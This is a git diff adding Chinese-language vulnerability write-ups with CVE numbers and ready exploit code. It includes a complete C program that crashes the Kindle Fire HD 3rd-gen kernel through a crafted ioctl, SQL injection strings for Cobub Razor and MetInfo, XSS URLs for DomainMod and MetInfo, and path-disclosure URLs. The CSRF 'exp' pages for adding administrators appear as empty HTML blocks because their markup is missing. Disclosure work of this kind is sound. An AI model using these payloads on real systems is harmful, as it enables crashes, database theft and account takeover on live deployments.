diff --git "a/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" "b/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" new file mode 100644 index 00000000..c51479ab --- /dev/null +++ "b/Amazon Kindle Fire HD (3rd Generation)\345\206\205\346\240\270\351\251\261\345\212\250\346\213\222\347\273\235\346\234\215\345\212\241\346\274\217\346\264\236.md" @@ -0,0 +1,230 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞|2018-10-10|大兵|[http://www.amazon.com/](http://www.amazon.com/) | [下载连接](https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2) |Fire OS 4.5.5.3| [CVE-2018-11021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021)| + +#### 漏洞概述 + +> Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。 + + +### POC实现代码如下: + +> exp代码如下: + +``` c +/* + * This is poc of Kindle Fire HD 3rd + * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517. + * Related buggy struct name is dsscomp_setup_dispc_data. + * This Poc should run with permission to do ioctl on /dev/dsscomp. + * + * The fowllwing is kmsg of kernel crash infomation: + * + * + */ +#include +#include +#include +#include + +const static char *driver = "/dev/dsscomp"; +static command = 1118064517; + +int main(int argc, char **argv, char **env) { + unsigned int payload[] = { + 0xffffffff, + 0x00000003, + 0x5d200040, + 0x79900008, + 0x8f5928bd, + 0x78b02422, + 0x00000000, + 0xffffffff, + 0xf4c50400, + 0x007fffff, + 0x8499f562, + 0xffff0400, + 0x001b131d, + 0x60818210, + 0x00000007, + 0xffffffff, + 0x00000000, + 0x9da9041c, + 0xcd980400, + 0x001f03f4, + 0x00000007, + 0x2a34003f, + 0x7c80d8f3, + 0x63102627, + 0xc73643a8, + 0xa28f0665, + 0x00000000, + 0x689e57b4, + 0x01ff0008, + 0x5e7324b1, + 0xae3b003f, + 0x0b174d86, + 0x00000400, + 0x21ffff37, + 0xceb367a4, + 0x00000040, + 0x00000001, + 0xec000f9e, + 0x00000001, + 0x000001ff, + 0x00000000, + 0x00000000, + 0x0000000f, + 0x0425c069, + 0x038cc3be, + 0x0000000f, + 0x00000080, + 0xe5790100, + 0x5b1bffff, + 0x0000d355, + 0x0000c685, + 0xa0070000, + 0x0010ffff, + 0x00a0ff00, + 0x00000001, + 0xff490700, + 0x0832ad03, + 0x00000006, + 0x00000002, + 0x00000001, + 0x81f871c0, + 0x738019cb, + 0xbf47ffff, + 0x00000040, + 0x00000001, + 0x7f190f33, + 0x00000001, + 0x8295769b, + 0x0000003f, + 0x869f2295, + 0xffffffff, + 0xd673914f, + 0x05055800, + 0xed69b7d5, + 0x00000000, + 0x0107ebbd, + 0xd214af8d, + 0xffff4a93, + 0x26450008, + 0x58df0000, + 0xd16db084, + 0x03ff30dd, + 0x00000001, + 0x209aff3b, + 0xe7850800, + 0x00000002, + 0x30da815c, + 0x426f5105, + 0x0de109d7, + 0x2c1a65fc, + 0xfcb3d75f, + 0x00000000, + 0x00000001, + 0x8066be5b, + 0x00000002, + 0xffffffff, + 0x5cf232ec, + 0x680d1469, + 0x00000001, + 0x00000020, + 0xffffffff, + 0x00000400, + 0xd1d12be8, + 0x02010200, + 0x01ffc16f, + 0xf6e237e6, + 0x007f0000, + 0x01ff08f8, + 0x000f00f9, + 0xbad07695, + 0x00000000, + 0xbaff0000, + 0x24040040, + 0x00000006, + 0x00000004, + 0x00000000, + 0xbc2e9242, + 0x009f5f08, + 0x00800000, + 0x00000000, + 0x00000001, + 0xff8800ff, + 0x00000001, + 0x00000000, + 0x000003f4, + 0x6faa8472, + 0x00000400, + 0xec857dd5, + 0x00000000, + 0x00000040, + 0xffffffff, + 0x3f004874, + 0x0000b77a, + 0xec9acb95, + 0xfacc0001, + 0xffff0001, + 0x0080ffff, + 0x3600ff03, + 0x00000001, + 0x8fff7d7f, + 0x6b87075a, + 0x00000000, + 0x41414141, + 0x41414141, + 0x41414141, + 0x41414141, + 0x001001ff, + 0x00000000, + 0x00000001, + 0xff1f0512, + 0x00000001, + 0x51e32167, + 0xc18c55cc, + 0x00000000, + 0xffffffff, + 0xb4aaf12b, + 0x86edfdbd, + 0x00000010, + 0x0000003f, + 0xabff7b00, + 0xffff9ea3, + 0xb28e0040, + 0x000fffff, + 0x458603f4, + 0xffff007f, + 0xa9030f02, + 0x00000001, + 0x002cffff, + 0x9e00cdff, + 0x00000004, + 0x41414141, + 0x41414141, + 0x41414141, + 0x41414141 }; + + int fd = 0; + fd = open(driver, O_RDWR); + if (fd < 0) { + printf("Failed to open %s, with errno %d\n", driver, errno); + system("echo 1 > /data/local/tmp/log"); + return -1; + } + + printf("Try open %s with command 0x%x.\n", driver, command); + printf("System will crash and reboot.\n"); + if(ioctl(fd, command, &payload) < 0) { + printf("Allocation of structs failed, %d\n", errno); + system("echo 2 > /data/local/tmp/log"); + return -1; + } + close(fd); + return 0; +} +``` diff --git "a/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" "b/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" new file mode 100644 index 00000000..0bd37d2a --- /dev/null +++ "b/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" @@ -0,0 +1,28 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Cobub Razor 0.7.2存在跨站请求伪造漏洞|2018-03-06|Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.7.2 | [CVE-2018-7720](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720)| + +#### 漏洞概述 + +> Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。 + +### POC实现代码如下: + +> 利用代码如下: +``` html + + +
+ + + + + + + +
+ + +``` \ No newline at end of file diff --git "a/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..87e5407d --- /dev/null +++ "b/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,29 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Cobub Razor 0.7.2越权增加管理员账户|2018-04-09|ppb(ppb@5ecurity.cn)|[https://github.com/cobub/razor/](https://github.com/cobub/razor/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.72| [CVE-2018-7745](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745)| + +#### 漏洞概述 + +> Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/161)告知作者。 + + +### POC实现代码如下: + +> 利用代码如下: +``` html + + + +
+ + + + + + +
+ + +``` diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 00000000..0e4814ea --- /dev/null +++ "b/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,18 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Cobub Razor 0.8.0存在SQL注入漏洞|2018-04-16|Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.8.0| [CVE-2018-8057](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057)| + +#### 漏洞概述 + +> Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 + + +### POC实现代码如下: + +> http://localhost/index.php?/manage/channel/addchannel +> POST data: +> 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1 +> 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1 + diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" new file mode 100644 index 00000000..59dece62 --- /dev/null +++ "b/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" @@ -0,0 +1,40 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Cobub Razor 0.8.0存在物理路径泄露漏洞|2018-04-20|Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) | 0.8.0| [CVE-2018-8056](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056)/[CVE-2018-8770](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770)| + +#### 漏洞概述 + +> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。 + +### POC实现代码如下: + +> 方法一: + +``` raw +URL: http://localhost/export.php +HTTP Method: GET +URL: http://localhost/index.php?/manage/channel/addchannel +HTTP Method: POST +Data: channel_name=test"&platform=1 +``` +> 方法二: +> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。 + +``` raw +HTTP Method: GET +http://localhost/tests/generate.php +http://localhost/tests/controllers/getConfigTest.php +http://localhost/tests/controllers/getUpdateTest.php +http://localhost/tests/controllers/postclientdataTest.php +http://localhost/tests/controllers/posterrorTest.php +http://localhost/tests/controllers/posteventTest.php +http://localhost/tests/controllers/posttagTest.php +http://localhost/tests/controllers/postusinglogTest.php +http://localhost/tests/fixtures/Controller_fixt.php +http://localhost/tests/fixtures/Controller_fixt2.php +http://localhost/tests/fixtures/view_fixt2.php +http://localhost/tests/libs/ipTest.php +http://localhost/tests/models/commonDbfix.php +``` diff --git "a/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" "b/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" new file mode 100644 index 00000000..acc39f55 --- /dev/null +++ "b/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" @@ -0,0 +1,39 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|DomainMod的XSS|2018-05-24|longer/套哥(taoge@5ecurity.cn)|[https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) | [https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) |4.09.03/4.10.0| [CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11404](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404)/[CVE-2018-11558](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558)/[CVE-2018-11559](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559)| + +#### 漏洞概述 + +> DomainMod v4.09.03版本和v4.10.0版本 存在XSS的页面 + + +### POC实现代码如下: + +> DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 + +>CSRF测试页面代码如下: +``` html +http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E +``` +> DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。 + +>CSRF测试页面代码如下: +``` html +http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E +``` +> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 + +>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: +``` raw +post url https://demo.domainmod.org/settings/profile/ +post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 +``` +> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。 + +>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发: +``` raw +post url https://demo.domainmod.org/settings/profile/ +post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0 +``` diff --git "a/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" "b/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" new file mode 100644 index 00000000..185c9f85 --- /dev/null +++ "b/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" @@ -0,0 +1,29 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Finecms_v5.4存在CSRF漏洞可修改管理员账户密码|2018-10-07|踏月留香|[http://www.finecms.net/](http://www.finecms.net/) | [http://down.chinaz.com/soft/32596.htm](http://down.chinaz.com/soft/32596.htm) |5.4| [CVE-2018-18191](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18191)| + +#### 漏洞概述 + +> 恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。 + +### POC实现代码如下: + +> exp代码如下: + +``` html + + + +
+ + + + + + +
+ + +``` diff --git "a/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..b95e62d8 --- /dev/null +++ "b/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,60 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户|2018-06-02|惜潮|[https://github.com/GreenCMS/GreenCMS](https://github.com/GreenCMS/GreenCMS) | [https://github.com/GreenCMS/GreenCMS](https://github.com/GreenCMS/GreenCMS) |v2.3.0603| [CVE-2018-11670](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670)/[CVE-2018-11671](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671)| + +#### 漏洞概述 + +> 恶意攻击者可以精心伪造一个Html页面 从而获取网站webshell。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/GreenCMS/GreenCMS/issues/108)/[issues](https://github.com/GreenCMS/GreenCMS/issues/109)告知作者。 + + +### POC实现代码如下: + +> 从CSRF到get webshell 的exp代码如下: + +``` html + + + + + csrf测试 + +
+ + + + +  + + +
+ +
+``` +> 从CSRF到增加管理员 的exp代码如下: + +``` html + + + + + csrf测试 + +   +     
+         +         +         +         +         +         +         +         +         +         + +      
+ +
+``` diff --git "a/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" "b/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" new file mode 100644 index 00000000..6d11ac72 --- /dev/null +++ "b/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" @@ -0,0 +1,48 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号|2019-01-13|AllenChen(520allen@gmail.com)|[http://www.hucart.com/](http://www.hucart.com/) | [http://www.hucart.com/](http://www.hucart.com/) |v5.7.4| [CVE-2019-6249](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249)| + +#### 漏洞概述 + +> Hucart cms v5.7.4版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加一个名为hack的管理员账号。 + +### POC实现代码如下: + +> exp代码如下: +> 增加一个名为hack密码为hack123的管理员账号。 + +``` html + + + +``` diff --git "a/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..f791fe19 --- /dev/null +++ "b/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,43 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户|2018-06-20|Bay0net|[http://www.lfdycms.com/](http://www.lfdycms.com/) | [http://www.lfdycms.com/](http://www.lfdycms.com/) |3.7.0| [CVE-2018-12602](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12602)| + +#### 漏洞概述 + +> 攻击者可通过构造 CSRF 请求,来新增任意用户。 + +### POC实现代码如下: + +> 通过CSRF增加任意用户 的exp代码如下: + +``` html + + + +
+ + + + + +
+ + +``` +> 通过CSRF增加管理员用户 的exp代码如下: + +``` html + + + +
+ + + + +
+ + +``` diff --git "a/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 00000000..78ec62b0 --- /dev/null +++ "b/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,38 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞|2018-10-12|踏月留香|[https://www.metinfo.cn/](https://www.metinfo.cn/) | [下载地址](https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip) |6.1.2| [CVE-2018-18296](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296)/[CVE-2018-17129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129)| + +#### 漏洞概述 + +> 漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞 +本地搭建网站,首先登录网站后台:`http://172.16.141.134/MetInfo6.1.2/admin/`,登录成功后,构造payload: +`http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e` ,即可执行跨站脚本。 + +### POC实现代码如下: + +> XSS漏洞的 exp代码如下: + +``` html +http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e +``` + +> SQL注入漏洞的 exp代码如下: +> 漏洞存在于MetInfo6.1.2 `/app/system/feedback/admin/feedback_admin.class.php`页面中,由于该页面的class1参数过滤不严,导致存在SQL注入漏洞。 +本地搭建网站,首先登录网站后台:`http://172.16.141.134/MetInfo6.1.2/admin/`,登录成功后,构造payload: +`http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(0x3a,user(),0x3a)//from/**/information_schema.tables&met_fd_export=-1`,访问后网站会导出一个excel表,excel表的名称为数据库用户名。 + + +``` html +http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(0x3a,user(),0x3a)/**/from/**/information_schema.tables&met_fd_export=-1 +``` + +### POC截图效果如下: + +- XSS漏洞POC运行截图 +![XSS漏洞POC运行截图](img/5.png) + +- SQL注入漏洞POC运行截图 +![SQL注入漏洞POC运行截图](img/6.png) + diff --git "a/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" new file mode 100644 index 00000000..4698ec03 --- /dev/null +++ "b/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" @@ -0,0 +1,35 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|MiniCMS 1.10存在CSRF漏洞可增加管理员账户|2018-03-30|zixian(me@zixian.org、zixian@5ecurity.cn)|[https://github.com/bg5sbk/MiniCMS](https://github.com/bg5sbk/MiniCMS) | [https://github.com/bg5sbk/MiniCMS](https://github.com/bg5sbk/MiniCMS) |1.10| [CVE-2018-9092](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9092)| + +#### 漏洞概述 + +> MiniCMS 1.10存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加管理员账户。MiniCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/bg5sbk/MiniCMS/issues/14)告知作者。 + +### POC实现代码如下: + +> CSRF测试页面代码如下: +``` html + + + test + +
+ + + + + + + + +
+ + + + + ``` \ No newline at end of file diff --git "a/POC_Details/S-CMS PHP v30\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.pdf" "b/POC_Details/S-CMS PHP v30\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.pdf" new file mode 100644 index 00000000..57910a59 Binary files /dev/null and "b/POC_Details/S-CMS PHP v30\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.pdf" differ diff --git "a/POC_Details/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.pdf" "b/POC_Details/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.pdf" new file mode 100644 index 00000000..cc6b232f Binary files /dev/null and "b/POC_Details/\345\244\251\347\277\274\345\210\233\347\273\264awifi\350\267\257\347\224\261\345\231\250\345\255\230\345\234\250\345\244\232\345\244\204\346\234\252\346\216\210\346\235\203\350\256\277\351\227\256\346\274\217\346\264\236.pdf" differ diff --git a/README.md b/README.md index 90177ea4..0dc713e7 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,30 @@ ## Web APP - [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) -- [ Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) +- [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) +- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) +- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) +- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) +- [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md) +- [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md) +- [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md)\ 